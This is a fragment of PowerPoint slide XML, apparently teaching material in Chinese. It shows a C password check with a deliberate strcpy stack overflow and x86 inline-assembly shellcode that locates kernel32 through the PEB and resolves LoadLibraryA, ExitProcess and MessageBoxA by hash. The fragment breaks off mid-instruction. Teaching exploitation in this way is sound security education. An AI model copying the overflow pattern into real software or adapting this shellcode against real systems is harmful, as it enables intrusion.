                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</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AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> REGCODE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"12345678"</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:b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verify</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>code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flag;</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buffer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44</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flag=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(REGCODE, code);</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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(buffer, code);</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flag; </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5351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11" end="1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
                                            <p:txEl>
                                              <p:pRg st="12" end="1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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  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B897E17-0513-0FB5-9333-4FB3D55BB184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773943" y="1052452"/>
            <a:ext cx="5111750" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>windows.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>CLD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </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清空标志位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DF</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push</a:t>
            </a:r>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0x1E380A6A</a:t>
            </a:r>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压入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MessageBoxA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hash--&gt;user32.dll</a:t>
            </a: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push</a:t>
            </a:r>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0x4FD18963</a:t>
            </a:r>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压入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ExitProcess</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hash--&gt;kernel32.dll</a:t>
            </a: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push</a:t>
            </a:r>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0x0C917432</a:t>
            </a:r>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压入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LoadLibraryA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hash--&gt;kernel32.dll</a:t>
            </a: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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi,esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>指向堆栈中存放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LoadLibraryA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的地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> - 0xc]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空出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>字节是为了兼容性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//======</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>开辟一些栈空间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xor</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bh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, 0x04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-=0x400</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压入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>user32.dll"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>mov bx, 0x3233</a:t>
            </a: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r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//0x3233       </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0x72657375          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//"user"</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esp</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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>=0</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找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>的基地址</a:t>
            </a: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fs:[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 0x30]   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//[TEB+0x30]--&gt;PEB</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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ecx</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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 0xC]   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//[PEB+0xC]---&gt;PEB_LDR_DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B018439-62F1-741F-FBBF-1E709E4F9BDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313488" y="1046975"/>
            <a:ext cx="5111750" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ecx</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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 0x1C] </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//[PEB_LDR_DATA+0x1C]--&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>InInitializationOrderModuleList</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>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ecx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进入链表第一个就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ntdll.dll</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ebp</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+ 0x8]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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>的基地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//======</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>是否找到了自己所需全部的函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>find_lib_functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a: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lodsd</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第一次取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LoadLibraryA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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
